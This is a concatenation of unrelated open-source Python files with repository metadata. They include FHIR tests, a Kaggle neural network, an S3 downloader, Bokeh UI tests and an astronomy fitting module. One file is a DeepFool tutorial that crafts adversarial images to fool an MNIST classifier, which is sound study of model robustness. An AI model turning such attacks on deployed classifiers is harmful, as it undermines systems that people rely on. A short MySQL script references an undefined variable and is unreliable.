self.assertEqual(inst.rest[0].resource[0].searchParam[1].definition, "http://hl7.org/fhir/SearchParameter/Patient-careprovider")
self.assertEqual(inst.rest[0].resource[0].searchParam[1].modifier[0], "missing")
self.assertEqual(inst.rest[0].resource[0].searchParam[1].name, "careprovider")
self.assertEqual(inst.rest[0].resource[0].searchParam[1].target[0], "Organization")
self.assertEqual(inst.rest[0].resource[0].searchParam[1].type, "reference")
self.assertEqual(inst.rest[0].resource[0].searchRevInclude[0], "Person")
self.assertEqual(inst.rest[0].resource[0].type, "Patient")
self.assertFalse(inst.rest[0].resource[0].updateCreate)
self.assertEqual(inst.rest[0].resource[0].versioning, "versioned-update")
self.assertEqual(inst.rest[0].security.certificate[0].blob, "IHRoaXMgYmxvYiBpcyBub3QgdmFsaWQ=")
self.assertEqual(inst.rest[0].security.certificate[0].type, "application/jwt")
self.assertTrue(inst.rest[0].security.cors)
self.assertEqual(inst.rest[0].security.description, "See Smart on FHIR documentation")
self.assertEqual(inst.rest[0].security.service[0].coding[0].code, "SMART-on-FHIR")
self.assertEqual(inst.rest[0].security.service[0].coding[0].system, "http://hl7.org/fhir/restful-security-service")
self.assertEqual(inst.software.name, "EHR")
self.assertEqual(inst.software.releaseDate.date, FHIRDate("2012-01-04").date)
self.assertEqual(inst.software.releaseDate.as_json(), "2012-01-04")
self.assertEqual(inst.software.version, "0.00.020.2134")
self.assertEqual(inst.status, "draft")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.url, "68D043B5-9ECF-4559-A57A-396E0D452311")
self.assertEqual(inst.version, "20130510")
def testConformance2(self):
inst = self.instantiate_from("conformance-phr-example.json")
self.assertIsNotNone(inst, "Must have instantiated a Conformance instance")
self.implConformance2(inst)
js = inst.as_json()
self.assertEqual("Conformance", js["resourceType"])
inst2 = conformance.Conformance(js)
self.implConformance2(inst2)
def implConformance2(self, inst):
self.assertEqual(inst.acceptUnknown, "no")
self.assertEqual(inst.contact[0].telecom[0].system, "other")
self.assertEqual(inst.contact[0].telecom[0].value, "http://hl7.org/fhir")
self.assertEqual(inst.date.date, FHIRDate("2013-06-18").date)
self.assertEqual(inst.date.as_json(), "2013-06-18")
self.assertEqual(inst.description, "Prototype Conformance Statement for September 2013 Connectathon")
self.assertEqual(inst.fhirVersion, "1.0.0")
self.assertEqual(inst.format[0], "json")
self.assertEqual(inst.format[1], "xml")
self.assertEqual(inst.id, "phr")
self.assertEqual(inst.kind, "capability")
self.assertEqual(inst.name, "PHR Template")
self.assertEqual(inst.publisher, "FHIR Project")
self.assertEqual(inst.rest[0].documentation, "Protoype server conformance statement for September 2013 Connectathon")
self.assertEqual(inst.rest[0].mode, "server")
self.assertEqual(inst.rest[0].resource[0].interaction[0].code, "read")
self.assertEqual(inst.rest[0].resource[0].interaction[1].code, "search-type")
self.assertEqual(inst.rest[0].resource[0].interaction[1].documentation, "When a client searches patients with no search criteria, they get a list of all patients they have access too. Servers may elect to offer additional search parameters, but this is not required")
self.assertEqual(inst.rest[0].resource[0].type, "Patient")
self.assertEqual(inst.rest[0].resource[1].interaction[0].code, "read")
self.assertEqual(inst.rest[0].resource[1].interaction[1].code, "search-type")
self.assertEqual(inst.rest[0].resource[1].searchParam[0].documentation, "_id parameter always supported. For the connectathon, servers may elect which search parameters are supported")
self.assertEqual(inst.rest[0].resource[1].searchParam[0].name, "_id")
self.assertEqual(inst.rest[0].resource[1].searchParam[0].type, "token")
self.assertEqual(inst.rest[0].resource[1].type, "DocumentReference")
self.assertEqual(inst.rest[0].resource[2].interaction[0].code, "read")
self.assertEqual(inst.rest[0].resource[2].interaction[1].code, "search-type")
self.assertEqual(inst.rest[0].resource[2].searchParam[0].documentation, "Standard _id parameter")
self.assertEqual(inst.rest[0].resource[2].searchParam[0].name, "_id")
self.assertEqual(inst.rest[0].resource[2].searchParam[0].type, "token")
self.assertEqual(inst.rest[0].resource[2].type, "Condition")
self.assertEqual(inst.rest[0].resource[3].interaction[0].code, "read")
self.assertEqual(inst.rest[0].resource[3].interaction[1].code, "search-type")
self.assertEqual(inst.rest[0].resource[3].searchParam[0].documentation, "Standard _id parameter")
self.assertEqual(inst.rest[0].resource[3].searchParam[0].name, "_id")
self.assertEqual(inst.rest[0].resource[3].searchParam[0].type, "token")
self.assertEqual(inst.rest[0].resource[3].searchParam[1].documentation, "which diagnostic discipline/department created the report")
self.assertEqual(inst.rest[0].resource[3].searchParam[1].name, "service")
self.assertEqual(inst.rest[0].resource[3].searchParam[1].type, "token")
self.assertEqual(inst.rest[0].resource[3].type, "DiagnosticReport")
self.assertEqual(inst.rest[0].security.service[0].text, "OAuth")
self.assertEqual(inst.software.name, "ACME PHR Server")
self.assertEqual(inst.text.status, "generated")
| {
"content_hash": "d2586fa386e08b38a5377f3861f15ccb",
"timestamp": "",
"source": "github",
"line_count": 163,
"max_line_length": 275,
"avg_line_length": 69.87116564417178,
"alnum_prop": 0.6986565984722101,
"repo_name": "all-of-us/raw-data-repository",
"id": "37abfd901e6bbe39e28c186044988a703d537219",
"size": "11515",
"binary": false,
"copies": "1",
"ref": "refs/heads/devel",
"path": "rdr_service/lib_fhir/fhirclient_1_0_6/models/conformance_tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "1866"
},
{
"name": "Mako",
"bytes": "1715"
},
{
"name": "Python",
"bytes": "17040924"
},
{
"name": "R",
"bytes": "2212"
},
{
"name": "Shell",
"bytes": "92213"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from __future__ import print_function
import numpy as np
import pandas as pd
np.random.seed(1337) # for reproducibility
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation
from keras.layers.normalization import BatchNormalization
from keras.layers.advanced_activations import PReLU
from keras.utils import np_utils, generic_utils
from keras.optimizers import Adam, SGD, Optimizer
from keras.callbacks import Callback, EarlyStopping, ModelCheckpoint
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix, log_loss
from sklearn.ensemble import BaggingClassifier
from sklearn.cross_validation import StratifiedKFold, KFold
path = '../Data/'
class LossHistory(Callback):
def on_train_begin(self, logs={}):
self.losses = []
def on_batch_end(self, batch, logs={}):
self.losses.append(logs.get('loss'))
def load_data(path, train=True):
df = pd.read_csv(path)
X = df.values.copy()
if train:
X, labels = X[:, 1:-1].astype(np.float32), X[:, -1]
return X, labels
else:
X, ids = X[:, 1:].astype(np.float32), X[:, 0].astype(str)
return X, ids
def preprocess_data(X, scaler=None):
if not scaler:
scaler = StandardScaler()
scaler.fit(X)
X = scaler.transform(X)
return X, scaler
def preprocess_labels(labels, encoder=None, categorical=True):
if not encoder:
encoder = LabelEncoder()
encoder.fit(labels)
y = encoder.transform(labels).astype(np.int32)
if categorical:
y = np_utils.to_categorical(y)
return y, encoder
def make_submission(y_prob, ids, encoder, fname):
with open(fname, 'w') as f:
f.write('id,')
f.write(','.join([str(i) for i in encoder.classes_]))
f.write('\n')
for i, probs in zip(ids, y_prob):
probas = ','.join([i] + [str(p) for p in probs.tolist()])
f.write(probas)
f.write('\n')
print("Wrote submission to file {}.".format(fname))
print("Loading data...")
X, labels = load_data(path+'train.csv', train=True)
#X=np.log(X+1)
#X=np.sqrt(X+(3/8))
X, scaler = preprocess_data(X)
y, encoder = preprocess_labels(labels)
X_test, ids = load_data(path+'test.csv', train=False)
#X_test=np.log(X_test+1)
#X_test=np.sqrt(X_test+(3/8))
X_test, _ = preprocess_data(X_test, scaler)
nb_classes = y.shape[1]
print(nb_classes, 'classes')
dims = X.shape[1]
print(dims, 'dims')
sample = pd.read_csv(path+'sampleSubmission.csv')
N = X.shape[0]
trainId = np.array(range(N))
submissionTr = pd.DataFrame(index=trainId,columns=sample.columns[1:])
nfold=8
RND = np.random.randint(0,10000,nfold)
pred = np.zeros((X_test.shape[0],9))
score = np.zeros(nfold)
i=0
skf = StratifiedKFold(labels, nfold, random_state=1337)
for tr, te in skf:
X_train, X_valid, y_train, y_valid = X[tr], X[te], y[tr], y[te]
predTr = np.zeros((X_valid.shape[0],9))
n_bag=10
for j in range(n_bag):
print('nfold: ',i,'/',nfold, ' n_bag: ',j,' /',n_bag)
print("Building model...")
model = Sequential()
model.add(Dense(512, input_shape=(dims,)))
model.add(PReLU())
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(512))
model.add(PReLU())
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(nb_classes))
model.add(Activation('softmax'))
ADAM=Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-8)
sgd=SGD(lr=0.01, momentum=0.9, decay=1e-6, nesterov=True)
model.compile(loss='categorical_crossentropy', optimizer="adam")
print("Training model...")
earlystopping=EarlyStopping(monitor='val_loss', patience=10, verbose=1)
checkpointer = ModelCheckpoint(filepath=path+"tmp/weights.hdf5", verbose=0, save_best_only=True)
model.fit(X_train, y_train, nb_epoch=1000, batch_size=128, verbose=2,
validation_data=(X_valid,y_valid), callbacks=[earlystopping,checkpointer])
model.load_weights(path+"tmp/weights.hdf5")
print("Generating submission...")
pred += model.predict_proba(X_test)
predTr += model.predict_proba(X_valid)
predTr /= n_bag
submissionTr.iloc[te] = predTr
score[i]= log_loss(y_valid,predTr,eps=1e-15, normalize=True)
print(score[i])
i+=1
pred /= (nfold * n_bag)
print("ave: "+ str(np.average(score)) + "stddev: " + str(np.std(score)))
make_submission(pred, ids, encoder, fname=path+'kerasNN2.csv')
print(log_loss(labels,submissionTr.values,eps=1e-15, normalize=True))
submissionTr.to_csv(path+"kerasNN2_retrain.csv",index_label='id')
# nfold 3, bagging 5: 0.4800704 + 0.005194
# nfold 3, bagging 10: 0.4764856 + 0.0060724
# nfold 5, bagging 5: 0.470483 + 0.011645
# nfold 5, bagging 10: 0.468049 + 0.0118616
# nfold 8, bagging 10: 0.469461 + 0.0100765
# tsne, nfold 5, bagging 5: 0.474645 + 0.0109076
| {
"content_hash": "2e43eaa32554f3b23344cada07d50580",
"timestamp": "",
"source": "github",
"line_count": 150,
"max_line_length": 98,
"avg_line_length": 32.44,
"alnum_prop": 0.6789971228935471,
"repo_name": "puyokw/kaggle_Otto",
"id": "8902b1c965397ea2c03526ac1fdcedf15814dcb9",
"size": "4866",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "new/src/1st_level/kerasNN2.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "54362"
},
{
"name": "R",
"bytes": "40237"
}
],
"symlink_target": ""
} |
class Animal(object):
def run(self):
print('Animal is Running...')
class Dog(Animal):
def run(self):
print('Dog is Running...')
class Cat(Animal):
pass
def run_twice(animal):
animal.run()
animal.run()
run_twice(Dog())
dog = Dog()
dog.run()
print(isinstance(dog, Dog))
print(isinstance(dog, Animal))
| {
"content_hash": "9ddc84e40d624f0ea0f3f8c563da05c1",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 37,
"avg_line_length": 15.5,
"alnum_prop": 0.6129032258064516,
"repo_name": "KrisCheng/HackerPractice",
"id": "d9e2b2e887f133510965c8ae2e05c0876063ac63",
"size": "368",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Python/oop/inherit.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "305"
},
{
"name": "HTML",
"bytes": "57696"
},
{
"name": "JavaScript",
"bytes": "83921"
},
{
"name": "Python",
"bytes": "18233"
}
],
"symlink_target": ""
} |
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
In order for this to work, the AWS credentials need to be set via environment variables!
Make sure to set following environment variables:
$ export AWS_ACCESS_KEY_ID=<Your AWS Access Key ID>
$ export AWS_SECRET_ACCESS_KEY=<Your AWS Secret Access Key>
"""
import argparse
from ConfigurationHandler import ConfigurationHandler
from libs3 import download, logger
from version import __version__
####################################################################
#
# FUNCTIONS
#
####################################################################
def parse_shell_parameters():
"""
Parse the provided shell parameters
"""
usage = '%(prog)s [-h, --help] [command]'
description = '%(prog)s AWS S3 SquashFS Image Downloader'
epilog = "And now you're in control!"
parser = argparse.ArgumentParser(description=description, epilog=epilog, usage=usage)
parser.add_argument('-v', '--version', action='version', version='%(prog)s ver.{0}'.format(__version__))
parser.add_argument('-o', '--output', action='store', help="Output file (under which to store the S3 object)",
required=True)
parser.add_argument('-k', '--key', action='store', help="The identifying key for this image in S3",
required=True)
parser.add_argument('-b', '--bucket', action='store', default=config.get('S3', 'bucket'),
help="A valid AWS S3 bucket (default: \"{0}\")".format(config.get('S3', 'bucket')))
log.debug("Shell arguments: {0}".format(parser.parse_args()))
return parser.parse_args()
def main():
"""
Run the whole thing
"""
# Get the shell arguments
args = parse_shell_parameters()
# Transfer shell arguments to variables
destination_file = args.output
bucket = args.bucket
image_key = args.key
# Ok, all set! We can download the file ...
log.debug('Downloading with key: "{0}" from bucket: "{1}" to output file: "{2}" '.format(image_key, bucket,
destination_file))
download(destination_file, image_key, bucket)
return 0
####################################################################
#
# MAIN
#
####################################################################
if __name__ == "__main__":
log = logger.get_logger('s3-image-download')
config = ConfigurationHandler().read_configuration()
main()
| {
"content_hash": "336c91965ad6c2be41b9a3551fb0da13",
"timestamp": "",
"source": "github",
"line_count": 90,
"max_line_length": 114,
"avg_line_length": 35.4,
"alnum_prop": 0.6180163214061519,
"repo_name": "cloudControl/s3-image-load",
"id": "d60bcb09a195e49c81900fc677cd740b53d04953",
"size": "3210",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/s3-image-download.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "16214"
},
{
"name": "Shell",
"bytes": "2050"
}
],
"symlink_target": ""
} |
from __future__ import annotations # isort:skip
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
from time import sleep
# External imports
from selenium.webdriver.common.keys import Keys
# Bokeh imports
from bokeh.layouts import column
from bokeh.models import (
ColumnDataSource,
CustomJS,
DataTable,
TableColumn,
TextInput,
)
from tests.support.plugins.project import BokehModelPage
from tests.support.util.selenium import (
RECORD,
enter_text_in_element,
find_element_for,
get_table_row,
shift_click,
)
#-----------------------------------------------------------------------------
# Tests
#-----------------------------------------------------------------------------
pytest_plugins = (
"tests.support.plugins.project",
)
@pytest.mark.selenium
class Test_DataTableCopyPaste:
def test_single_row_copy(self, bokeh_model_page: BokehModelPage) -> None:
data = {'x': [1,2,3,4], 'y': [1,1,1,1], 'd': ['foo', 'bar', 'baz', 'quux']}
source = ColumnDataSource(data)
table = DataTable(columns=[
TableColumn(field="x", title="x"),
TableColumn(field="y", title="y"),
TableColumn(field="d", title="d"),
], source=source)
text_input = TextInput()
text_input.js_on_change('value', CustomJS(code=RECORD("value", "cb_obj.value")))
page = bokeh_model_page(column(table, text_input))
row = get_table_row(page.driver, table, 2)
row.click()
enter_text_in_element(page.driver, row, Keys.INSERT, mod=Keys.CONTROL, click=0, enter=False)
input_el = find_element_for(page.driver, text_input)
enter_text_in_element(page.driver, input_el, Keys.INSERT, mod=Keys.SHIFT, enter=False)
enter_text_in_element(page.driver, input_el, "")
sleep(0.5)
results = page.results
assert results['value'] == '1\t2\t1\tbar'
assert page.has_no_console_errors()
def test_single_row_copy_with_zero(self, bokeh_model_page: BokehModelPage) -> None:
data = {'x': [1,2,3,4], 'y': [0,0,0,0], 'd': ['foo', 'bar', 'baz', 'quux']}
source = ColumnDataSource(data)
table = DataTable(columns=[
TableColumn(field="x", title="x"),
TableColumn(field="y", title="y"),
TableColumn(field="d", title="d"),
], source=source)
text_input = TextInput()
text_input.js_on_change('value', CustomJS(code=RECORD("value", "cb_obj.value")))
page = bokeh_model_page(column(table, text_input))
row = get_table_row(page.driver, table, 2)
row.click()
enter_text_in_element(page.driver, row, Keys.INSERT, mod=Keys.CONTROL, click=0, enter=False)
input_el = find_element_for(page.driver, text_input)
enter_text_in_element(page.driver, input_el, Keys.INSERT, mod=Keys.SHIFT, enter=False)
enter_text_in_element(page.driver, input_el, "")
sleep(0.5)
results = page.results
assert results['value'] == '1\t2\t0\tbar'
assert page.has_no_console_errors()
def test_multi_row_copy(self, bokeh_model_page: BokehModelPage) -> None:
data = {'x': [1,2,3,4], 'y': [0,1,2,3], 'd': ['foo', 'bar', 'baz', 'quux']}
source = ColumnDataSource(data)
table = DataTable(columns=[
TableColumn(field="x", title="x"),
TableColumn(field="y", title="y"),
TableColumn(field="d", title="d"),
], source=source)
text_input = TextInput()
text_input.js_on_change('value', CustomJS(code=RECORD("value", "cb_obj.value")))
page = bokeh_model_page(column(table, text_input))
row = get_table_row(page.driver, table, 1)
row.click()
row = get_table_row(page.driver, table, 3)
shift_click(page.driver, row)
enter_text_in_element(page.driver, row, Keys.INSERT, mod=Keys.CONTROL, click=0, enter=False)
input_el = find_element_for(page.driver, text_input)
enter_text_in_element(page.driver, input_el, Keys.INSERT, mod=Keys.SHIFT, enter=False)
enter_text_in_element(page.driver, input_el, "")
results = page.results
# XXX (bev) these should be newlines with a TextAreaInput but TextAreaInput
# is not working in tests for some reason presently
assert results['value'] == '0\t1\t0\tfoo 1\t2\t1\tbar 2\t3\t2\tbaz'
assert page.has_no_console_errors()
| {
"content_hash": "236fcc16a84280c84bb08fd04cc37dc2",
"timestamp": "",
"source": "github",
"line_count": 136,
"max_line_length": 100,
"avg_line_length": 33.98529411764706,
"alnum_prop": 0.572263089571614,
"repo_name": "bokeh/bokeh",
"id": "40ba07e2112d8b8346c2edf6d5ba2f822aa902f9",
"size": "5142",
"binary": false,
"copies": "1",
"ref": "refs/heads/branch-3.1",
"path": "tests/integration/widgets/tables/test_copy_paste.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "1884"
},
{
"name": "Dockerfile",
"bytes": "1924"
},
{
"name": "GLSL",
"bytes": "44696"
},
{
"name": "HTML",
"bytes": "53475"
},
{
"name": "JavaScript",
"bytes": "20301"
},
{
"name": "Less",
"bytes": "46376"
},
{
"name": "Python",
"bytes": "4475226"
},
{
"name": "Shell",
"bytes": "7673"
},
{
"name": "TypeScript",
"bytes": "3652153"
}
],
"symlink_target": ""
} |
"""Python interface to GenoLogics LIMS via its REST API.
Usage example: Get some projects.
Per Kraulis, Science for Life Laboratory, Stockholm, Sweden.
"""
import codecs
from genologics.lims import *
# Login parameters for connecting to a LIMS instance.
from genologics.config import BASEURI, USERNAME, PASSWORD
# Create the LIMS interface instance, and check the connection and version.
lims = Lims(BASEURI, USERNAME, PASSWORD)
lims.check_version()
# Get the list of all projects.
projects = lims.get_projects()
print len(projects), 'projects in total'
# Get the list of all projects opened since May 30th 2012.
day = '2012-05-30'
projects = lims.get_projects(open_date=day)
print len(projects), 'projects opened since', day
# Get the project with the specified LIMS id, and print some info.
project = Project(lims, id='P193')
print project, project.name, project.open_date, project.close_date
print ' UDFs:'
for key, value in project.udf.items():
if isinstance(value, unicode):
value = codecs.encode(value, 'UTF-8')
print ' ', key, '=', value
udt = project.udt
print ' UDT:', udt.udt
for key, value in udt.items():
if isinstance(value, unicode):
value = codecs.encode(value, 'UTF-8')
print ' ', key, '=', value
print ' files:'
for file in project.files:
print file.id
print file.content_location
print file.original_location
| {
"content_hash": "8780f0db7a50c8e6703bc7801037e32c",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 75,
"avg_line_length": 27.333333333333332,
"alnum_prop": 0.7116212338593975,
"repo_name": "jwhite007/genologics",
"id": "47c102e795458d376f9db5bdab7079ea5fd2cbe4",
"size": "1394",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "examples/get_projects.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "232163"
}
],
"symlink_target": ""
} |
"""
DeepFool tutorial on mnist using advbox tool.
Deepfool is a simple and accurate adversarial attack method.
It supports both targeted attack and non-targeted attack.
"""
import sys
sys.path.append("..")
import matplotlib.pyplot as plt
import paddle.fluid as fluid
import paddle.v2 as paddle
from advbox.adversary import Adversary
from advbox.attacks.deepfool import DeepFoolAttack
from advbox.models.paddle import PaddleModel
from tutorials.mnist_model import mnist_cnn_model
def main():
"""
Advbox demo which demonstrate how to use advbox.
"""
TOTAL_NUM = 500
IMG_NAME = 'img'
LABEL_NAME = 'label'
img = fluid.layers.data(name=IMG_NAME, shape=[1, 28, 28], dtype='float32')
# gradient should flow
img.stop_gradient = False
label = fluid.layers.data(name=LABEL_NAME, shape=[1], dtype='int64')
logits = mnist_cnn_model(img)
cost = fluid.layers.cross_entropy(input=logits, label=label)
avg_cost = fluid.layers.mean(x=cost)
# use CPU
place = fluid.CPUPlace()
# use GPU
# place = fluid.CUDAPlace(0)
exe = fluid.Executor(place)
BATCH_SIZE = 1
train_reader = paddle.batch(
paddle.reader.shuffle(
paddle.dataset.mnist.train(), buf_size=128 * 10),
batch_size=BATCH_SIZE)
test_reader = paddle.batch(
paddle.reader.shuffle(
paddle.dataset.mnist.test(), buf_size=128 * 10),
batch_size=BATCH_SIZE)
fluid.io.load_params(
exe, "./mnist/", main_program=fluid.default_main_program())
# advbox demo
m = PaddleModel(
fluid.default_main_program(),
IMG_NAME,
LABEL_NAME,
logits.name,
avg_cost.name, (-1, 1),
channel_axis=1)
attack = DeepFoolAttack(m)
attack_config = {"iterations": 100, "overshoot": 9}
# use train data to generate adversarial examples
total_count = 0
fooling_count = 0
for data in train_reader():
total_count += 1
adversary = Adversary(data[0][0], data[0][1])
# DeepFool non-targeted attack
adversary = attack(adversary, **attack_config)
# DeepFool targeted attack
# tlabel = 0
# adversary.set_target(is_targeted_attack=True, target_label=tlabel)
# adversary = attack(adversary, **attack_config)
if adversary.is_successful():
fooling_count += 1
print(
'attack success, original_label=%d, adversarial_label=%d, count=%d'
% (data[0][1], adversary.adversarial_label, total_count))
# plt.imshow(adversary.target, cmap='Greys_r')
# plt.show()
# np.save('adv_img', adversary.target)
else:
print('attack failed, original_label=%d, count=%d' %
(data[0][1], total_count))
if total_count >= TOTAL_NUM:
print(
"[TRAIN_DATASET]: fooling_count=%d, total_count=%d, fooling_rate=%f"
% (fooling_count, total_count,
float(fooling_count) / total_count))
break
# use test data to generate adversarial examples
total_count = 0
fooling_count = 0
for data in test_reader():
total_count += 1
adversary = Adversary(data[0][0], data[0][1])
# DeepFool non-targeted attack
adversary = attack(adversary, **attack_config)
# DeepFool targeted attack
# tlabel = 0
# adversary.set_target(is_targeted_attack=True, target_label=tlabel)
# adversary = attack(adversary, **attack_config)
if adversary.is_successful():
fooling_count += 1
print(
'attack success, original_label=%d, adversarial_label=%d, count=%d'
% (data[0][1], adversary.adversarial_label, total_count))
# plt.imshow(adversary.target, cmap='Greys_r')
# plt.show()
# np.save('adv_img', adversary.target)
else:
print('attack failed, original_label=%d, count=%d' %
(data[0][1], total_count))
if total_count >= TOTAL_NUM:
print(
"[TEST_DATASET]: fooling_count=%d, total_count=%d, fooling_rate=%f"
% (fooling_count, total_count,
float(fooling_count) / total_count))
break
print("deelfool attack done")
if __name__ == '__main__':
main()
| {
"content_hash": "5b0ece1e4e0c9232484bf8404999d9dc",
"timestamp": "",
"source": "github",
"line_count": 137,
"max_line_length": 84,
"avg_line_length": 32.175182481751825,
"alnum_prop": 0.5905172413793104,
"repo_name": "qingqing01/models",
"id": "2b12c81945859b42809e33ccd74ead53f4d4eb05",
"size": "4408",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "fluid/adversarial/tutorials/mnist_tutorial_deepfool.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "15149"
},
{
"name": "Python",
"bytes": "1397018"
},
{
"name": "Shell",
"bytes": "24648"
}
],
"symlink_target": ""
} |
import mysql.connector
import send_to_db
from os.path import join, dirname
import json
def main(config):
output = []
db = mysql.connector.Connect(**config)
cursor = db.cursor()
stmts = ["SELECT * FROM top_cities(cities)"]
with open ('top_cities.txt','w') as file:
for item in suggestion_list:
file.write(str(item))
file.write('\n')
if __name__ == '__main__':
config = {
'host': 'localhost',
'port': 3306,
'database': 'udest',
'user': 'root',
'password': '',
'charset': 'utf8',
'use_unicode': True,
'get_warnings': True,
}
#out = main(config)
#print('\n'.join(out))
send_to_db.main(config) | {
"content_hash": "358de27d6a75497f58042177753760ca",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 48,
"avg_line_length": 21.303030303030305,
"alnum_prop": 0.5533428165007113,
"repo_name": "jpmunic/udest",
"id": "1adc6b101bcdea07ecaf652931c0c717ec2d01c4",
"size": "703",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/watson_receive_from_db.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "77582"
},
{
"name": "JavaScript",
"bytes": "43347"
},
{
"name": "PHP",
"bytes": "17162"
},
{
"name": "Python",
"bytes": "62795"
}
],
"symlink_target": ""
} |
"""Config flow to configure demo component."""
from homeassistant import config_entries
# pylint: disable=unused-import
from . import DOMAIN
class DemoConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Demo configuration flow."""
VERSION = 1
async def async_step_import(self, import_info):
"""Set the config entry up from yaml."""
return self.async_create_entry(title="Demo", data={})
| {
"content_hash": "7eb34d19c05959ac0d84fc173367cef5",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 63,
"avg_line_length": 26.5625,
"alnum_prop": 0.6988235294117647,
"repo_name": "Teagan42/home-assistant",
"id": "e6b275920c8c16ea0f4dd2d3ddeadaf3fb35ce34",
"size": "425",
"binary": false,
"copies": "4",
"ref": "refs/heads/dev",
"path": "homeassistant/components/demo/config_flow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "19774313"
},
{
"name": "Shell",
"bytes": "6846"
}
],
"symlink_target": ""
} |
""" A fantastic python code to determine the quenched SFH parameters of galaxies using emcee (http://dan.iel.fm/emcee/current/). This file contains all the functions needed to determine the mean SFH parameters of a population.
N.B. The data files .ised_ASCII contain the extracted bc03 models and have a 0 in the origin at [0,0]. The first row contains the model ages (from the second column) - data[0,1:]. The first column contains the model lambda values (from the second row) - data[1:,0]. The remaining data[1:,1:] are the flux values at each of the ages (columns, x) and lambda (rows, y) values
"""
import numpy as N
import scipy as S
import pylab as P
import pyfits as F
from scipy.io.idl import readsav
import pyfits as F
import emcee
import triangle
import time
import os
import matplotlib.image as mpimg
from astropy.cosmology import FlatLambdaCDM
from scipy.stats import kde
from scipy.interpolate import LinearNDInterpolator
from scipy.interpolate import interp2d
from itertools import product
import sys
cosmo = FlatLambdaCDM(H0 = 71.0, Om0 = 0.26)
font = {'family':'serif', 'size':16}
P.rc('font', **font)
P.rc('xtick', labelsize='medium')
P.rc('ytick', labelsize='medium')
P.rc('axes', labelsize='medium')
method = raw_input('Do you wish to use a look-up table? (yes/no) :')
if method == 'yes' or method =='y':
prov = raw_input('Do you wish to use the provided u-r and NUV-u look up tables? (yes/no) :')
if prov == 'yes' or prov =='y':
print 'gridding...'
tq = N.linspace(0.003, 13.8, 100)
tau = N.linspace(0.003, 4, 100)
ages = N.linspace(10.88861228, 13.67023409, 50)
grid = N.array(list(product(ages, tau, tq)))
print 'loading...'
nuv_pred = N.load('nuv_look_up_ssfr.npy')
ur_pred = N.load('ur_look_up_ssfr.npy')
lu = N.append(nuv_pred.reshape(-1,1), ur_pred.reshape(-1,1), axis=1)
elif prov=='no' or prov=='n':
col1 = str(raw_input('Location of your NUV-u colour look up table :'))
col2 = str(raw_input('Location of your u-r colour look up table :'))
one = N.array(input('Define first axis values (ages) of look up table start, stop, len(axis1); e.g. 10, 13.8, 50 :'))
ages = N.linspace(float(one[0]), float(one[1]), float(one[2]))
two = N.array(input('Define second axis values (tau) of look up table start, stop, len(axis1); e.g. 0, 4, 100 : '))
tau = N.linspace(float(two[0]), float(two[1]), float(two[2]))
three = N.array(input('Define third axis values (tq) of look up table start, stop, len(axis1); e.g. 0, 13.8, 100 : '))
tq = N.linspace(float(three[0]), float(three[1]), float(three[2]))
grid = N.array(list(product(ages, tau, tq)))
print 'loading...'
nuv_pred = N.load(col1)
ur_pred = N.load(col2)
lu = N.append(nuv_pred.reshape(-1,1), ur_pred.reshape(-1,1), axis=1)
else:
sys.exit("You didn't give a valid answer (yes/no). Try running again.")
def lnlike_one(theta, ur, sigma_ur, nuvu, sigma_nuvu, age):
""" Function for determining the likelihood of ONE quenching model described by theta = [tq, tau] for all the galaxies in the sample. Simple chi squared likelihood between predicted and observed colours of the galaxies.
:theta:
An array of size (1,2) containing the values [tq, tau] in Gyr.
:tq:
The time at which the onset of quenching begins in Gyr. Allowed ranges from the beginning to the end of known cosmic time.
:tau:
The exponential timescale decay rate of the star formation history in Gyr. Allowed range from the rest of the functions is 0 < tau [Gyr] < 5.
:ur:
Observed u-r colour of a galaxy; k-corrected.
:sigma_ur:
Error on the observed u-r colour of a galaxy
:nuvu:
Observed nuv-u colour of a galaxy; k-corrected.
:sigma_nuvu:
Error on the observed nuv-u colour of a galaxy
:age:
Observed age of a galaxy, often calculated from the redshift i.e. at z=0.1 the age ~ 12.5. Must be in units of Gyr.
RETURNS:
Array of same shape as :age: containing the likelihood for each galaxy at the given :theta:
"""
tq, tau = theta
